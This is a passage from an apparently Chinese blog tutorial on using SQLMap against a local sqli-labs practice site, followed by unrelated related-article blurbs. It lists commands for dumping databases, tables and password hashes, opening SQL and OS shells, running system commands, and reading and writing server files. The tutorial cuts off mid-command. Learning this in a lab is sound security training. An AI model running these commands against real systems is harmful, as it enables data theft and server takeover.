SQLMap注入工具

简介: SQLMap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。

SQLMap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。

SQLMap 入门

使用靶场sqli-lab 下载phpstudy 将压缩包解压到phpsutdy下的www目录更改数据配置文件 浏览器访问127.0.0.1/sqli-lab 即可 进行安装

判断是否存在注入点

python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1"   #弹出一堆代码可以判断存在漏洞

通过HTTP请求 是否存在注入

通过burp 抓取数据包 保存到文本文件里

    python sqlmap.py -r 1.txt

    那么找到了注入点 就开始干坏事了

    查询当前用户下所有的数据库

      python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --dbs

      获取数据库中的表名

        python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security --tables

        640.png

        获取表中的字段名

          python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --columns

          640.png

          获取数据库用户的密码  (本人懒 没设置密码)

            python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --passwords

            获取当前网站的数据库名称

              python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --current-db

              获取当前当前网站数据库的用户名

                python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --current-user

                SQLMap 进阶

                --level 5 探测等级

                参数--level 5 指需要执行的测试等级 分五个等级,可不加level  默认1。

                SQLMap使用的payload可以在xml/payloads.xml 中看到,也可以根据相应的格式添加自己喜欢的payload,5包含的最多,会破解cookie xff等 比较慢。

                http cookie在2级时可以检测

                HTTP user-Agent/Referer在3级时就会检测

                --is-dba  当前用户是否为dba权限

                  python sqlmap.py -u  "http://127.0.0.1/sqli/Less-1/?id=1" --is-dba

                  --roles  列出数据库的管理角色

                    python sqlmap.py -u  "http://127.0.0.1/sqli/Less-1/?id=1" --roles

                    --referer HTTP Referer头

                    当–level参数设定为3或3以上时,会尝试对HTTP Referer注入。可以使用referer命令来欺骗,eg:  --referer http://www.lvxinjie.cn

                    --sql-shell  运行自定义的sql 语句

                      python sqlmap.py -u  "http://127.0.0.1/sqli/Less-1/?id=1" --sql-shell

                      --os-cmd , --os-shell 执行任意系统操作命令

                        python sqlmap.py -u  "http://127.0.0.1/sqli/Less-1/?id=1" --os-cmd

                        --file-read 从数据库读取文件

                          python sqlmap.py -u  "http://127.0.0.1/sqli/Less-1/?id=1" --file-read "C:\nc.exe"" -v 1

                          --file-write --file-dest 上传文件至服务器中

                            python sqlmap.py -u  "http://127.0.0.1/sqli/Less-1/?id=1" --file-write "/root/n
                            相关文章
                            |
                            6月前
                            |
                            人工智能 Linux API
                            保姆级图文教程!OpenClaw(Clawdbot)阿里云/本地部署+百炼API配置+自定义Skill开发手册
                            OpenClaw(原Clawdbot)作为开源AI Agent框架,其核心优势在于“本地化运行保障隐私+模块化技能拓展+低代码定制”。区别于传统云端AI工具,它支持将模型、数据、技能全链路部署在本地设备,同时允许用户通过简单配置实现功能定制,成为注重数据安全与个性化需求用户的首选工具。参考文章聚焦本地化部署与技能开发核心逻辑,本文在此基础上补充2026年最新适配细节、阿里云部署方案、阿里云百炼API配置流程及避坑指南,所有代码命令可直接复制执行,确保零基础用户从环境搭建到技能开发一站式落地。
                            2345 5
                            |
                            人工智能 运维 分布式计算
                            35+姐姐的大数据专业逆袭指南:7张证书助你弯道超车
                            善用经验杠杆: 面试时强调证书代表的新技能 + 多年积累的行业洞察、业务理解、沟通协调能力,这是新人无法比拟的复合优势。 链接人脉: 加入考证学习群、参加线下沙龙,结识同行伙伴,信息互通,机会共享。
                            |
                            6月前
                            |
                            人工智能 Linux 网络安全
                            不动编辑器写代码:OpenClaw保姆级部署(阿里云/Win11/Mac/Linux)+AI编码(口述修Bug+PR提交)+FAQ
                            “发现Bug→打开IDE→定位代码→调试修复→提交PR”,这是开发者的常规操作流程,一套下来至少花费半小时。但2026年,OpenClaw(昵称“小龙虾”)的AI编码能力彻底颠覆了这一模式——参考文章作者仅通过口述需求,就让OpenClaw自动拉取代码、分析Bug、编写修复代码、启动测试服务器,全程零代码操作,甚至能直接提交PR,将修Bug的时间从“半小时”压缩至“几分钟”。
                            2567 14
                            CCF推荐A类会议和期刊总结:计算机体系结构/并行与分布计算/存储系统领域
                            中国计算机学会(CCF)2022年版推荐目录涵盖了计算机体系结构、并行与分布计算、存储系统领域的多个A类会议和期刊。本文汇总了这些顶级资源的全称、出版社、dblp网址及领域。包括《ACM计算机系统汇刊》、《ACM存储汇刊》等期刊,以及ACM PPoPP、USENIX FAST等会议,为研究人员提供了重要学术参考。
                            14998 64
                            CCF推荐A类会议和期刊总结:计算机体系结构/并行与分布计算/存储系统领域
                            |
                            监控 SoC Python
                            基于改进下垂控制的微电网控制研究(Simulink仿真实现)
                            基于改进下垂控制的微电网控制研究(Simulink仿真实现)
                            397 3
                            |
                            存储 人工智能 编解码
                            吞噬混沌:CodeBuddy与流程利刃,斩破游戏开发的蛮荒时代(一)
                            本文探讨了《飞机大战游戏开发流程规范》的工程化实践,涵盖版本控制、任务分配与系统设计。通过CodeBuddy智能工具,实现分支管理自动化、环境配置标准化及代码质量提升。在UI开发中,CodeBuddy确保继承规范与Docstring完整性;AI行为树开发中,它检测逻辑死循环与状态处理问题;输入系统设计中,辅助键位绑定一致性与事件处理完整性。CodeBuddy作为腾讯云推出的智能助手,将静态规范转化为动态辅助,助力游戏开发迈向“规范为骨、智能为翼”的新时代。
                            534 4
                            |
                            小程序 JavaScript Java
                            流浪动物救助小程序|基于微信小程序的流浪动物救助系统设计与实现(源码+数据库+文档)
                            流浪动物救助小程序|基于微信小程序的流浪动物救助系统设计与实现(源码+数据库+文档)
                            668 1
                            |
                            人工智能 JSON 自然语言处理
                            让AI听懂你的建模需求!BlenderMCP:自然语言指令直接操控 Blender,一句话生成复杂3D场景
                            BlenderMCP通过MCP协议实现Blender与Claude AI的无缝集成,支持通过自然语言指令完成3D建模、材质调整等复杂操作,显著提升创作效率。
                            2112 1
                            让AI听懂你的建模需求!BlenderMCP:自然语言指令直接操控 Blender,一句话生成复杂3D场景
                            |
                            存储 固态存储 Linux
                            从 0 学服务器虚拟化:VMware 搭建 3 个虚拟主机,个人 / 小企业够用的方案
                            服务器虚拟化技术通过在单台物理机上运行多个虚拟机,显著提升资源利用率和管理灵活性。本文以 VMware ESXi 8.0 Update 3e 为例,详解如何搭建经济实用的虚拟化环境,支持 3 个虚拟主机稳定运行,适合个人开发者和小企业降低硬件投入、实现数据本地化与安全存储。
                            2612 0